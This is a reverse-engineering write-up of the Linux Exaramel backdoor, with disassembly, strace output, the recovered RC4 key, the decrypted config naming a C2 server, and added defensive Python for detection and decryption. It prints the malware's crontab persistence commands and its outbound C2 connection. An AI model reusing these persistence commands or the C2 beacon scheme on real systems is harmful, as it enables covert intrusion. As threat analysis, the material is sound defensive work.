- // Linux/Exaramel (BlackEnergy) - APT ELF malware
- // ref: https://www.virustotal.com/gui/file/c39b4105e1b9da1a9cccb1dace730b1c146496c591ce0927fb035d48e9cb5c0f/details
- // binary form: Go (built with vendored packages, hence the "app/vendor/..." symbol names)
- // quick analysis by @unixfreaxjp on radare2 & tsurugi linux seccon
- // *) work in progress: the contents can change. #MalwareMustDie!
- ###############################
- # Summary #
- ###############################
- 0. Checks, clones itself, and initiates the run space.
- 1. Uses both a lock file (/tmp/.applock, a unix socket) & a futex to protect the running instance,
- i.e. a new instance of the binary exits because of the lock file; duplicate clones are controlled by the futex.
- 2. Aims at persistence via cron & systemd/init startup.
- 3. Reads the encrypted config file; if it does not exist, drops a hardcoded encrypted one.
- 4. Grabs host information & fills the template for C2 callbacks.
- 5. C2 establishment: sends the information after reading the config, then starts listening.
- 6. Host resolving uses libnss; networking supports the system proxy.
- 7. Supports remote command execution.
- 8. My opinion: developer-made work, not crooks.
- 9. Comments: https://twitter.com/malwaremustd1e/status/1216466744446840837
- ###############################
- # Binary Analysis #
- ###############################
- 1. Machine: Advanced Micro Devices X86-64
- 2. Symbol table '.symtab' contains 7726 entries.
- 3. go build ID
- 0x00400fd8 3133 3631 3236 3730 3763 6466 3136 6364 136126707cdf16cd
- 0x00400fe8 6133 3231 3562 6561 6435 3833 6331 6665 a3215bead583c1fe
- 0x00400ff8 3765 3237 3530 3636 48c7 4424 1000 0000 7e275066H.D$....
- Notes at offset 0x00000fc8 with length 0x00000038:
- Owner Data size Description
- Go 0x00000028 Unknown note type: (0x00000004)
- 4. Program Headers:
- Type Offset VirtAddr PhysAddr FileSiz MemSiz Flg Align
- PHDR 0x000040 0x0000000000400040 0x0000000000400040 0x000188 0x000188 R 0x1000
- NOTE 0x000fc8 0x0000000000400fc8 0x0000000000400fc8 0x000038 0x000038 R 0x4
- LOAD 0x000000 0x0000000000400000 0x0000000000400000 0x248c80 0x248c80 R E 0x1000
- LOAD 0x249000 0x0000000000649000 0x0000000000649000 0x1ac10f 0x1ac10f R 0x1000
- LOAD 0x3f6000 0x00000000007f6000 0x00000000007f6000 0x02f7e0 0x052400 RW 0x1000
- GNU_STACK 0x000000 0x0000000000000000 0x0000000000000000 0x000000 0x000000 RW 0x8
- LOOS+5041580 0x000000 0x0000000000000000 0x0000000000000000 0x000000 0x000000 0x8
- 5. Go syntax v1.8
- /usr/lib/go-1.8/lib/time/zoneinfo.zip
- ###############################
- # Static Reversing Analysis #
- ###############################
- [0x00455940]> pdf
- ┌ 18: entry0 (int64_t arg_8h);
- │ ; arg int64_t arg_8h @ rsp+0x8
- │ 0x00455940 488d742408 lea rsi, [arg_8h]
- │ 0x00455945 488b3c24 mov rdi, qword [rsp]
- │ 0x00455949 488d05100000. lea rax, [main] ; sym.go.main
- │ ; 0x455960 ; "H\x8d\x05\x89\xc2\xff\xff\xff\xe0\xcc\xcc\xcc\xcc\xcc\xcc\u030b|$\b\xb8\xe7"
- └ 0x00455950 ffe0 jmp rax
- --- more ---
- :
- [0x00455940]> s sym.main.main
- [0x00647540]> pd 6
- ; CODE XREF from sym.main.main @ 0x648803
- ;-- sym.go.main.main:
- ┌ 4808: sym.main.main ();
- │ bp: 0 (vars 0, args 0)
- │ sp: 105 (vars 105, args 0)
- │ rg: 0 (vars 0, args 0)
- │ 0x00647540 64488b0c25f8. mov rcx, qword fs:[0xfffffffffffffff8]
- │ 0x00647549 488d842408fc. lea rax, [rsp - 0x3f8]
- │ 0x00647551 483b4110 cmp rax, qword [rcx + 0x10]
- │ ┌─< 0x00647555 0f86a3120000 jbe 0x6487fe
- │ │ 0x0064755b 4881ec780400. sub rsp, 0x478
- │ │ 0x00647562 4889ac247004. mov qword [var_470h], rbp
- --- more ---
- :
- [0x00647540]> pdsf
- ;-- sym.go.main.main:
- 0x00647572 call sym.main.getCurrentDir
- 0x006475b4 call sym.runtime.concatstring2
- 0x006475d0 call sym.time.Now
- 0x00647618 call sym.time.Time.String
- 0x0064768a call sym.net.Listen
- 0x006476d0 call sym.runtime.makechan
- 0x00647727 call fcn.00454c1d fcn.00454c1d
- 0x006477ba call sym.os_signal.Notify
- 0x006477f9 call sym.runtime.newproc
- 0x0064783c call sym.runtime.newobject
- 0x0064787c call sym.app_vendor_configur.LoadConfig
- 0x00647905 obj.main.defaulthost.str // <====== C2 placeholder var
- 0x00647968 call sym.app_vendor_configur.UpdateConfig
- 0x00647981 call sym.runtime.makechan
- 0x006479a7 call sym.runtime.makechan
- 0x006479cd call sym.runtime.makechan
- 0x006479ea call sym.runtime.newobject
- 0x00647a38 call sym.runtime.newobject
- 0x00647a63 call fcn.00454c20 fcn.00454c20
- 0x00647af4 call fcn.00454f96 fcn.00454f96
- 0x00647b01 call sym.app_vendor_worker.__Worker_.CheckAdapt
- 0x00647bbd call sym.app_vendor_worker.__Worker_.GetUser
- 0x00647be8 call sym.app_vendor_worker.__Worker_.GetOS
- 0x00647c27 call sym.runtime.newproc
- 0x00647c51 call fcn.00454bfa fcn.00454bfa
- 0x00647c77 call sym.runtime.newselect
- 0x00647ca2 call sym.runtime.selectrecv
- --- more ---
- // persistence #1: cron
- chdir("/var/spool/cron"), 1) = 0;
- execve("/bin/sh", ["/bin/sh", "-c", "(crontab -l 2>/dev/null) | grep /test/Exaramel && echo 'true' || echo 'false'"]) = 0;
- execve("/usr/bin/crontab", ["crontab", "-l"]) = 0;
- execve("/bin/sh", ["/bin/sh", "-c", "(crontab -l 2>/dev/null; echo '*/1 * * * * /test/Exaramel') | crontab -"]) = 0;
- execve("/bin/sh", ["/bin/sh", "-c", "(crontab -l 2>/dev/null; echo '@reboot /test/Exaramel') | crontab -"]) = 0;
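A defender-side check for the pattern those crontab commands install, as an added example (not code from the original paste): it parses a `crontab -l` listing and reports any program scheduled both every minute and at @reboot. The listing below is constructed for the demo.

```python
# Added example (not from the original paste): flag Exaramel-style cron
# persistence, i.e. the same program in an every-minute and an @reboot entry.
import shlex

# Constructed sample listing, shaped like the entries the strace lines above add.
SAMPLE_CRONTAB = """\
# m h dom mon dow command
MAILTO=root
0 3 * * * /usr/bin/certbot renew --quiet
*/1 * * * * /test/Exaramel
@reboot /test/Exaramel
"""


def parse_crontab(text):
    """Yield (schedule, command) pairs; skips comments, blanks and VAR=value lines."""
    for line in text.splitlines():
        line = line.strip()
        if not line or line.startswith("#") or "=" in line.split()[0]:
            continue
        if line.startswith("@"):            # @reboot, @daily, ...
            sched, _, cmd = line.partition(" ")
        else:                               # five time fields, then the command
            fields = line.split(None, 5)
            if len(fields) < 6:
                continue
            sched, cmd = " ".join(fields[:5]), fields[5]
        yield sched, cmd.strip()


def is_every_minute(sched):
    """True for "*/1 * * * *" and "* * * * *", which both fire every minute."""
    fields = sched.split()
    return len(fields) == 5 and fields[1:] == ["*"] * 4 and fields[0] in ("*", "*/1")


def command_path(cmd):
    """First token of the command (the scheduled program), shell-quoting aware."""
    try:
        return shlex.split(cmd)[0]
    except (ValueError, IndexError):
        parts = cmd.split()
        return parts[0] if parts else ""


def find_exaramel_style_persistence(text):
    """Return programs that appear both in an every-minute and in an @reboot entry."""
    every_minute, at_reboot = set(), set()
    for sched, cmd in parse_crontab(text):
        path = command_path(cmd)
        if sched == "@reboot":
            at_reboot.add(path)
        elif is_every_minute(sched):
            every_minute.add(path)
    return sorted(every_minute & at_reboot)


if __name__ == "__main__":
    for hit in find_exaramel_style_persistence(SAMPLE_CRONTAB):
        print("suspicious dual cron persistence:", hit)
```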
- // persistence #2: service/init files checked
- stat("/etc/rc.d/syslogger",..) = 0;
- stat("/etc/init/syslogd.conf",..) = 0;
- stat("/etc/systemd/system/syslogd.service",..) = 0;
- stat("/etc/init.d/syslogd",..) = 0;
- // check user
- execve("/bin/sh", ["/bin/sh", "-c", "whoami"]
- // used for sending data to c2 with hardcoded template:
- generation=%d&guid=%s&platform=%s&version=%d&whoami=%s%0A
- // lock runfile
- "/tmp/.applock"
- code: getsockname(3, {sa_family=AF_FILE, path="/tmp/.applock"}, [16])
- // command execution support (os/exec is initialised)
- 0x32676 16 15 os/exec.Command
- 0x32686 23 22 os/exec.interfaceEqual
- 0x3269d 20 19 os/exec.(*Cmd).envv
- 0x326b1 21 20 os/exec.(*Cmd).stdin
- 0x326c6 22 21 os/exec.(*Cmd).stdout
- 0x326dc 22 21 os/exec.(*Cmd).stderr
- 0x326f2 32 31 os/exec.(*Cmd).writerDescriptor
- 0x32712 32 31 os/exec.(*Cmd).closeDescriptors
- 0x32732 21 20 os/exec.(*Cmd).Start
- 0x32747 27 26 os/exec.(*ExitError).Error
- 0x32762 20 19 os/exec.(*Cmd).Wait
- 0x32776 26 25 os/exec.(*Cmd).StdoutPipe
- 0x32790 26 25 os/exec.(*Cmd).StderrPipe
- 0x327aa 15 14 os/exec.init.1
- 0x327b9 23 22 os/exec.findExecutable
- 0x327d0 17 16 os/exec.LookPath
- 0x327e1 29 28 os/exec.interfaceEqual.func1
- 0x327fe 27 26 os/exec.(*Cmd).stdin.func1
- 0x32819 38 37 os/exec.(*Cmd).writerDescriptor.func1
- 0x3283f 27 26 os/exec.(*Cmd).Start.func1
- 0x3285a 27 26 os/exec.(*Cmd).Start.func2
- 0x32875 21 20 os/exec.init.1.func1
- 0x3288a 13 12 os/exec.init <====
- --- more ---
- :
- void sym.os_exec.init(undefined8 param_1, undefined8 param_2, int64_t param_3)
- {
- uint64_t *puVar1;
- int64_t extraout_RDX;
- int64_t in_FS_OFFSET;
- undefined8 uStack24;
- undefined8 uStack16;
- while (puVar1 = (uint64_t *)(*(int64_t *)(in_FS_OFFSET + 0xfffffff8) + 0x10),
- *(BADSPACEBASE **)0x20 < (undefined *)*puVar1 || (undefined *)*(BADSPACEBASE **)0x20 == (undefined *)*puVar1)
- {
- sym.runtime.morestack_noctxt(param_1, param_2, param_3);
- param_3 = extraout_RDX;
- }
- if (1 < (uint8_t)obj.os_exec.initdone.) {
- return;
- }
- if (obj.os_exec.initdone. == (code)0x1) {
- sym.runtime.throwinit();
- do {
- invalidInstructionException();
- } while( true );
- }
- obj.os_exec.initdone. = (code)0x1;
- sym.bytes.init();
- sym.context.init();
- sym.io.init();
- sym.os.init();
- sym.path_filepath.init();
- sym.runtime.init();
- sym.strconv.init();
- sym.strings.init();
- sym.sync.init();
- sym.syscall.init();
- sym.errors.New();
- _obj.os_exec.ErrNotFound = uStack24;
- if (_obj.runtime.writeBarrier == 0) {
- *(undefined8 *)0x826548 = uStack16;
- } else {
- sym.runtime.writebarrierptr();
- }
- sym.os_exec.init.1();
- obj.os_exec.initdone. = (code)0x2;
- return;
- }
- :
- ; CALL XREF from sym.app_vendor_worker.init @ 0x64623b
- ;-- sym.go.os_exec.init:
- / 234: sym.os_exec.init ();
- | bp: 0 (vars 0, args 0)
- | sp: 4 (vars 4, args 0)
- | rg: 0 (vars 0, args 0)
- | 0x00623e10 mov rcx, qword fs:[0xfffffffffffffff8]
- | 0x00623e19 cmp rsp, qword [rcx + 0x10]
- | ,=< 0x00623e1d jbe 0x623ef0
- | | 0x00623e23 sub rsp, 0x28
- ; ---------------------------
- | : 0x0064623b call sym.os_exec.init ;[1]
- | : 0x00646240 call sym.path_filepath.init ;[2]
- | : 0x00646245 call sym.regexp.init ;[3]
- | : 0x0064624a call sym.runtime.init ;[4]
- | : 0x0064624f call sym.strconv.init ;[5]
- | : 0x00646254 call sym.strings.init ;[6]
- | : 0x00646259 call sym.syscall.init ;[7]
- | : 0x0064625e call sym.time.init ;[8]
- | : 0x00646263 mov byte [obj.app_vendor_worker.initdone.], 2 ; [0x843345:1]=0
- | : 0x0064626a mov rbp, qword [rsp]
- | : 0x0064626e add rsp, 8
- --- more ---
- :
- ; CALL XREF from sym.main.init @ 0x648a74
- ;-- sym.go.app_vendor_worker.init:
- / 173: sym.app_vendor_worker.init ();
- | bp: 0 (vars 0, args 0)
- | sp: 0 (vars 0, args 0)
- | rg: 0 (vars 0, args 0)
- | 0x006461d0 mov rcx, qword fs:[0xfffffffffffffff8]
- | 0x006461d9 cmp rsp, qword [rcx + 0x10]
- | ,=< 0x006461dd jbe 0x646273
- | | 0x006461e3 sub rsp, 8
- ; ---------------------------
- | : 0x00648a74 call sym.app_vendor_worker.init ;[1]
- | : 0x00648a79 call sym.app_vendor_github.com_satori_go_2euuid.init ;[2]
- | : 0x00648a7e mov byte [obj.main.initdone.], 2 ; [0x843374:1]=0
- | : 0x00648a85 mov rbp, qword [rsp]
- | : 0x00648a89 add rsp, 8
- | : 0x00648a8d ret
- | : ; CODE XREF from sym.main.init @ 0x6489fd
- | : 0x00648a8e call sym.runtime.morestack_noctxt ;[3]
- \ `=< 0x00648a93 jmp sym.main.init
- 0x00648a98 int3
- 0x00648a99 int3
- --- more ---
- :
- [0x00648a23 [xAdvc]0 0% 180 Exaramel]> pd $r @ sym.main.init+51 # 0x648a23
- | : ; CODE XREF from sym.main.init @ 0x648a18
- | ,==< 0x00648a23 7507 jne 0x648a2c
- | |: 0x00648a25 e896e8ddff call sym.runtime.throwinit ;[1]
- | |: 0x00648a2a 0f0b ud2
- | |: ; CODE XREF from sym.main.init @ 0x648a23
- | `--> 0x00648a2c c60541a91f00. mov byte [obj.main.initdone.], 1 ; [0x843374:1]=0
- | : 0x00648a33 e8d837e9ff call sym.app_vendor_configur.init ;[2]
- | : 0x00648a38 e82310e7ff call sym.fmt.init ;[3]
- | : 0x00648a3d e89e48e9ff call sym.math_rand.init ;[4]
- | : 0x00648a42 e8896becff call sym.net.init ;[5]
- | : 0x00648a47 e804bcfcff call sym.app_vendor_network.init ;[6]
- | : 0x00648a4c e8efdde4ff call sym.os.init ;[7]
- | : 0x00648a51 e86ad3fcff call sym.os_signal.init ;[8]
- | : 0x00648a56 e8e51ce9ff call sym.path_filepath.init ;[9]
- | : 0x00648a5b e8b02cfdff call sym.app_vendor_scheduler.init ;[?]
- | : 0x00648a60 e8cbd8e1ff call sym.strconv.init ;[?]
- | : 0x00648a65 e8b6afe7ff call sym.strings.init ;[?]
- | : 0x00648a6a e80172e3ff call sym.syscall.init ;[?]
- | : 0x00648a6f e83c6ee4ff call sym.time.init ;[?]
- | : 0x00648a74 e857d7ffff call sym.app_vendor_worker.init ;[?]
- | : 0x00648a79 e8f2e6ffff call sym.app_vendor_github.com_satori_go_2euuid.init ;[?]
- | : 0x00648a7e c605efa81f00. mov byte [obj.main.initdone.], 2 ; [0x843374:1]=0
- | : 0x00648a85 488b2c24 mov rbp, qword [rsp]
- | : 0x00648a89 4883c408 add rsp, 8
- | : 0x00648a8d c3 ret
- --- more ---
- :
- if (1 < (uint8_t)obj.main.initdone.) {
- return;
- }
- if (obj.main.initdone. == (code)0x1) {
- sym.runtime.throwinit();
- do {
- invalidInstructionException();
- } while( true );
- }
- obj.main.initdone. = (code)0x1;
- sym.app_vendor_configur.init();
- sym.fmt.init();
- sym.math_rand.init();
- sym.net.init();
- sym.app_vendor_network.init();
- sym.os.init();
- sym.os_signal.init();
- sym.path_filepath.init();
- sym.app_vendor_scheduler.init();
- sym.strconv.init();
- sym.strings.init();
- sym.syscall.init();
- sym.time.init();
- sym.app_vendor_worker.init();
- sym.app_vendor_github.com_satori_go_2euuid.init();
- obj.main.initdone. = (code)0x2;
- return;
- }
- // proxy support:
- 0x005f8bc0 42 1298 sym.net_http.ProxyFromEnvironment
- 0x005f90e0 6 141 sym.net_http.ProxyURL
- 0x005fad00 7 248 sym.net_http.__connectMethod_.proxyAuth
- 0x005ffa30 67 1631 sym.net_http.useProxy
- 0x00607600 1 28 sym.net_http.ProxyURL.func1
- --- more ---
- :
- 0x9788ea 36 35 net/http.(*connectMethod).proxyAuth
- 0x97961f 18 17 net/http.useProxy
- 0x97b757 24 23 net/http.ProxyURL.func1
- 0x9dbc43 22 21 net/http.httpProxyEnv
- 0x9dbc6d 23 22 net/http.httpsProxyEnv
- 0x9dc038 20 19 net/http.noProxyEnv
- 0x768d 22 21 net/http.httpProxyEnv
- 0x76a3 23 22 net/http.httpsProxyEnv
- 0x78de 20 19 net/http.noProxyEnv
- 0x2e857 30 29 net/http.ProxyFromEnvironment
- 0x2e875 18 17 net/http.ProxyURL
- --- more ---
- :
- void sym.net_http.__connectMethod_.proxyAuth(undefined8 param_1, undefined8 param_2, int64_t param_3)
- {
- uint64_t *puVar1;
- int64_t extraout_RDX;
- int64_t in_FS_OFFSET;
- int64_t *in_stack_00000008;
- undefined8 in_stack_00000010;
- undefined8 in_stack_00000018;
- while (puVar1 = (uint64_t *)(*(int64_t *)(in_FS_OFFSET + 0xfffffff8) + 0x10),
- *(BADSPACEBASE **)0x20 < (undefined *)*puVar1 || (undefined *)*(BADSPACEBASE **)0x20 == (undefined *)*puVar1)
- {
- sym.runtime.morestack_noctxt(param_1, param_2, param_3);
- param_3 = extraout_RDX;
- }
- if (*in_stack_00000008 != 0) {
- if (*(int64_t *)(*in_stack_00000008 + 0x20) != 0) {
- sym.net_http.basicAuth();
- sym.runtime.concatstring2();
- return;
- }
- return;
- }
- return;
- }
- --- more ---
- :
- ; CODE XREF from sym.net_http.__connectMethod_.proxyAuth @ 0x5fadf3
- ; CALL XREFS from sym.net_http.__Transport_.dialConn @ 0x5fe1b1, 0x5ff325
- ;-- sym.go.net_http.__connectMethod_.proxyAuth:
- / 248: sym.net_http.__connectMethod_.proxyAuth (int64_t arg_8h, int64_t arg_10h, int64_t arg_18h);
- | bp: 0 (vars 0, args 0)
- | sp: 10 (vars 7, args 3)
- | rg: 0 (vars 0, args 0)
- | 0x005fad00 mov rcx, qword fs:[0xfffffffffffffff8]
- | 0x005fad09 cmp rsp, qword [rcx + 0x10]
- | ,=< 0x005fad0d jbe 0x5fadee
- | | 0x005fad13 sub rsp, 0x40
- ; ---------------------------
- | 0x005fe1b1 call sym.net_http.__connectMethod_.proxyAuth ;[1] M=======
- | 0x005fe1b6 mov rax, qword [var_4b0h]
- | 0x005fe1bb mov rcx, qword [var_4b8h]
- | 0x005fe1c0 test rax, rax
- | ,=< 0x005fe1c3 jne 0x5ff1c6
- | | ; CODE XREF from sym.net_http.__Transport_.dialConn @ 0x5ff1fa
- | | 0x005fe1c9 lea rax, [0x0068f0a0]
- | | 0x005fe1d0 mov qword [rsp], rax
- | | 0x005fe1d4 mov rax, qword [var_300h]
- | | 0x005fe1dc mov qword [var_4b8h], rax
- | | 0x005fe1e1 mov rcx, qword [var_2f8h]
- --- more ---
- :
- ;-- sym.go.net_http.__Transport_.dialConn:
- 0x005fda2d call sym.runtime.newobject
- 0x005fda58 int64_t arg1
- 0x005fda5c int64_t arg2
- 0x005fda6e call fcn.00454fa4 fcn.00454fa4
- 0x005fda7b call sym.net_http.__connectMethod_.key
- 0x005fda80 int64_t arg2
- 0x005fda85 int64_t arg1
- 0x005fda97 call fcn.00454f96 fcn.00454f96
- 0x005fdab4 call sym.runtime.makechan
- :
- 0x005fdb69 call sym.runtime.newobject
- 0x005fdbad int64_t arg2
- 0x005fdbbf call fcn.00454f96 fcn.00454f96
- 0x005fdc8f call sym.net_http_httptrace.ContextClientTrace
- 0x005fdd41 call sym.net_http.__connectMethod_.addr ;"tcp -> <== ==> @@@ MB) \r\t\n as at fp= in is lr: of on pc= sp: sp=!= 0%x\r\n><'\'"
- 0x005fdd7d call rcx
- 0x005fde21 call sym.crypto_tls.__Conn_.Handshake
- 0x005fde70 call sym.runtime.newproc
- 0x005fdeeb call fcn.00454f34 fcn.00454f34
- 0x005fdf17 call rbx
- 0x005fdf29 call sym.runtime.newobject
- 0x005fdf47 call sym.crypto_tls.__Conn_.ConnectionState
- --- end ---
- // drop config
- openat(AT_FDCWD, "{current dir}config.json", 1|2|0|0, 0666) = 0 ;
- // writes the data below, encrypted with Go's crypto/rc4 library:
- 0x006f9990 6874 7470 733a 2f2f 3137 362e 3331 2e32 https://176.31.2
- 0x006f99a0 3235 2e32 3034 2f61 7069 2f76 3100 0000 25.204/api/v1...
- // encryption key :
- in:
- [0x006da25a [xAdvc]0 37% 16384 Exaramel]> pd $r @ hit2_0
- ; DATA XREFS from sym.main.main @ 0x647823, 0x6486eb
- │ 0x00647787 488d8c249800. lea rcx, [var_98h]
- │ 0x0064778f 48898c24b002. mov qword [var_2b0h], rcx
- │ 0x00647797 48890424 mov qword [rsp], rax
- │ 0x0064779b 488d8c247802. lea rcx, [var_278h]
- │ 0x006477a3 48894c2408 mov qword [var_8h], rcx
- │ 0x006477a8 48c744241004. mov qword [var_10h], 4
- │ 0x006477b1 48c744241804. mov qword [var_18h], 4
- │ 0x006477ba e8e1defcff call sym.os_signal.Notify
- │ 0x006477bf 488b84242001. mov rax, qword [var_120h]
- │ 0x006477c7 4889442410 mov qword [var_10h], rax
- │ 0x006477cc 488b84244001. mov rax, qword [var_140h]
- │ 0x006477d4 4889442418 mov qword [var_18h], rax
- │ 0x006477d9 488b8c244801. mov rcx, qword [var_148h]
- │ 0x006477e1 48894c2420 mov qword [var_20h], rcx
- │ 0x006477e6 c70424180000. mov dword [rsp], 0x18
- │ 0x006477ed 488d1534160a. lea rdx, [0x006e8e28]
- │ 0x006477f4 4889542408 mov qword [var_8h], rdx
- │ 0x006477f9 e8729cdeff call sym.runtime.newproc
- │ 0x006477fe 488b05c3e71d. mov rax, qword [0x00825fc8]
- │ 0x00647805 4885c0 test rax, rax
- │ ┌─< 0x00647808 7527 jne 0x647831
- │ │ 0x0064780a 48c705b3e71d. mov qword [0x00825fc8], 0xa
- │ │ 0x00647815 8b0515bf1f00 mov eax, dword [obj.runtime.writeBarrier]
- │ │ 0x0064781b 85c0 test eax, eax
- │┌──< 0x0064781d 0f85bd0e0000 jne 0x6486e0
- │││ 0x00647823 488d05302a09. lea rax, [hit2_0] ; 0x6da25a ; "s0m3t3rr0r" <======KEY!!
- │││ 0x0064782a 4889058fe71d. mov qword [obj.main.key], rax
- --- more ---
- :
- [0x006da25a [xAdvc]0 37% 16384 Exaramel]> ps
- 0x006da25a <nil>runtime: s0m3t3rr0r(++junk)
- // config
- ~/test$ r2 config.json
- -- Invert the block bytes using the 'I' key in visual mode
- [0x00000000]> px
- - offset - 0 1 2 3 4 5 6 7 8 9 A B C D E F 0123456789ABCDEF
- 0x00000000 4f65 e400 ded5 2b33 3a61 37b5 1fd8 ffdf Oe....+3:a7.....
- 0x00000010 9f57 b918 6d1e e9b8 8116 057f a636 08e2 .W..m........6..
- 0x00000020 4b5a 15c1 57a1 a0e9 1297 49e8 2942 8f78 KZ..W.....I.)B.x
- 0x00000030 e267 95ad aead 0846 5074 d17f 9eab e8c6 .g.....FPt......
- 0x00000040 7c29 d378 4fd7 5071 c311 53f5 de02 32d0 |).xO.Pq..S...2.
- 0x00000050 3e93 45e8 de72 a424 70fb 00e0 f30f 5be0 >.E..r.$p.....[.
- 0x00000060 37eb 47a9 d57e ebee 583f 339c 5672 23c4 7.G..~..X?3.Vr#.
- 0x00000070 adbf d997 2f99 5a7f 063c 9ba5 7028 15b7 ..../.Z..<..p(..
- 0x00000080 3ce6 da90 98ae 8c34 f8b2 0331 a445 d517 <......4...1.E..
- 0x00000090 a946 173b c506 c450 0f9e 6a48 d068 b6c8 .F.;...P..jH.h..
- 0x000000a0 ffff ffff ffff ffff ffff ffff ffff ffff ................
- // the file is RC4-encrypted with the key above; decrypt it with any RC4 implementation:
- {"Hosts":["https://176.31.225.204/api/v1"],"Proxy":"","Version":"1","Guid":"c65f5f15-2e64-4b41-9c95-59f0d94f5fca","Next":20,"Datetime":"","Timeout":30,"Def":20}
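That decryption reproduced as an added example (not code from the original paste or from the malware): a plain RC4 routine run over the 0xa0 bytes of config.json transcribed from the `px` dump above, with the key recovered from obj.main.key, returning the parsed JSON.

```python
# Added example (not from the original paste): decrypt the dumped config.json
# with a plain RC4 implementation and the key recovered from obj.main.key.
import json

# Ciphertext transcribed from the `px` dump of config.json above (0xa0 bytes;
# the trailing row of 0xff in that dump is r2's padding past the end of file).
CONFIG_HEX = (
    "4f65e400ded52b333a6137b51fd8ffdf"
    "9f57b9186d1ee9b88116057fa63608e2"
    "4b5a15c157a1a0e9129749e829428f78"
    "e26795adaead08465074d17f9eabe8c6"
    "7c29d3784fd75071c31153f5de0232d0"
    "3e9345e8de72a42470fb00e0f30f5be0"
    "37eb47a9d57eebee583f339c567223c4"
    "adbfd9972f995a7f063c9ba5702815b7"
    "3ce6da9098ae8c34f8b20331a445d517"
    "a946173bc506c4500f9e6a48d068b6c8"
)
KEY = b"s0m3t3rr0r"  # the string at hit2_0 that main stores in obj.main.key


def rc4(key: bytes, data: bytes) -> bytes:
    """Plain RC4; the same routine encrypts and decrypts (as Go's crypto/rc4 does)."""
    # key-scheduling algorithm (KSA)
    S = list(range(256))
    j = 0
    for i in range(256):
        j = (j + S[i] + key[i % len(key)]) & 0xFF
        S[i], S[j] = S[j], S[i]
    # pseudo-random generation algorithm (PRGA), keystream XORed over the data
    out = bytearray()
    i = j = 0
    for byte in data:
        i = (i + 1) & 0xFF
        j = (j + S[i]) & 0xFF
        S[i], S[j] = S[j], S[i]
        out.append(byte ^ S[(S[i] + S[j]) & 0xFF])
    return bytes(out)


def decrypt_config(blob: bytes, key: bytes = KEY) -> dict:
    """RC4-decrypt an Exaramel config blob and parse the JSON inside."""
    return json.loads(rc4(key, blob).decode("utf-8"))


def c2_hosts(cfg: dict) -> list:
    """Pull the C2 URLs out of a decrypted config (its "Hosts" array)."""
    return list(cfg.get("Hosts", []))


if __name__ == "__main__":
    cfg = decrypt_config(bytes.fromhex(CONFIG_HEX))
    print(json.dumps(cfg, indent=2))
    print("C2:", c2_hosts(cfg))
```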
- // c2
- 0x6f9990 30 29 https://176.31.225.204/api/v1
- // the C2 callback is visible at OS level in:
- connect(6, {sa_family=AF_INET, sin_port=htons(443), sin_addr=inet_addr("176.31.225.204")
- // file enumeration (this happens before C2 networking starts, per clone)
- getdents64($SOCKET, {{d_ino=$INODENUM, d_off=$OFFSETNUM,..
- loop
- {
- lstat("{$CURRPATH}/{files}"..);
- openat(AT_FDCWD, "{$CURRPATH}/{$DIRS}"..
- }
- getdents64($SOCKET, {}, $MMAP);
- close($SOCKET);
- ###############################
- # Dynamic Analysis #
- ###############################
- // running process (memory maps, then open files before/during/after the C2 connection):
- 00400000-00649000 r-xp 00000000 08:01 397381 /test/Exaramel
- 00649000-007f6000 r--p 00249000 08:01 397381 /test/Exaramel
- 007f6000-00826000 rw-p 003f6000 08:01 397381 /test/Exaramel
- 00826000-00849000 rw-p 00000000 00:00 0
- c000000000-c000001000 rw-p 00000000 00:00 0
- c41fff8000-c420100000 rw-p 00000000 00:00 0
- 7f32836ed000-7f328378d000 rw-p 00000000 00:00 0
- 7fff6fc00000-7fff6fc21000 rw-p 00000000 00:00 0 [stack]
- 7fff6fdb9000-7fff6fdba000 r-xp 00000000 00:00 0 [vdso]
- ffffffffff600000-ffffffffff601000 r-xp 00000000 00:00 0 [vsyscall]
- Exaramel cwd DIR 8,1 4096 397369 /test
- Exaramel rtd DIR 8,1 4096 2 /
- Exaramel txt REG 8,1 6469139 397381 /test/Exaramel
- Exaramel 0u CHR 136,0 0t0 3 /dev/pts/0
- Exaramel 1u CHR 136,0 0t0 3 /dev/pts/0
- Exaramel 2u CHR 136,0 0t0 3 /dev/pts/0
- Exaramel 3u unix 0xffff88000f2c6480 0t0 6334 /tmp/.applock
- Exaramel 4u 0000 0,9 0 1203 anon_inode
- Exaramel 5r CHR 1,9 0t0 1210 /dev/urandom
- Exaramel 6r FIFO 0,8 0t0 6350 pipe
- Exaramel 8r FIFO 0,8 0t0 6351 pipe
- Exaramel cwd DIR 8,1 4096 397369 /test
- Exaramel rtd DIR 8,1 4096 2 /
- Exaramel txt REG 8,1 6469139 397381 /test/Exaramel
- Exaramel 0u CHR 136,0 0t0 3 /dev/pts/0
- Exaramel 1u CHR 136,0 0t0 3 /dev/pts/0
- Exaramel 2u CHR 136,0 0t0 3 /dev/pts/0
- Exaramel 3u unix 0xffff88000f2c6480 0t0 6334 /tmp/.applock
- Exaramel 4u 0000 0,9 0 1203 anon_inode
- Exaramel 5r CHR 1,9 0t0 1210 /dev/urandom
- Exaramel 6r IPv4 6424 0t0 TCP $LOCAL:34573->176.31.225.204:443
- Exaramel cwd DIR 8,1 4096 397369 /test
- Exaramel rtd DIR 8,1 4096 2 /
- Exaramel txt REG 8,1 6469139 397381 /test/Exaramel
- Exaramel 0u CHR 136,0 0t0 3 /dev/pts/0
- Exaramel 1u CHR 136,0 0t0 3 /dev/pts/0
- Exaramel 2u CHR 136,0 0t0 3 /dev/pts/0
- Exaramel 3u unix 0xffff88000f2c6480 0t0 6334 /tmp/.applock
- Exaramel 4u 0000 0,9 0 1203 anon_inode
- Exaramel 5r CHR 1,9 0t0 1210 /dev/urandom
- // Live radare2 forensics (before)
- 0xc4200a6440 2304 /test/Exaramel]> pxx @ obj.runtime.enoptrbss+528867392 # 0xc4200a6440
- - offset - 0123456789ABCDEF0123456789ABCDEF0123456789ABCDEF0123456789ABCDEF
- 0xc4200a6440 Access-Control-Allow-Origin.....Content-Disposition.............
- 0xc4200a6480 If-Unmodified-Since.............Proxy-Authenticate..............
- 0xc4200a64c0 Proxy-Authorization.............Strict-Transport-Security.......
- 0xc4200a6500 Transfer-Encoding...............config.json.....................
- 0xc4200a6540 ..m...............m...............m.....................`.. ....
- 0xc4200a6580 listen unix /tmp/.applock.......bind: address already in use....
- 0xc4200a65c0 App has already started!.......................................
- // Live radare2 forensics (after)
- :
- 0xc42000ed90 Authorization...Content-EncodingContent-LocationContent-Range...Expect..If-MatchLinkMax-
- 0xc42000ede8 ForwardsRangeReferer....RefreshTrailer..Retry-After.....Vary100101102200Www-Authenticate
- 0xc42000ee40 201202203204205.206207208226300.301302303304305.307308400401402.403404405406407.40840941
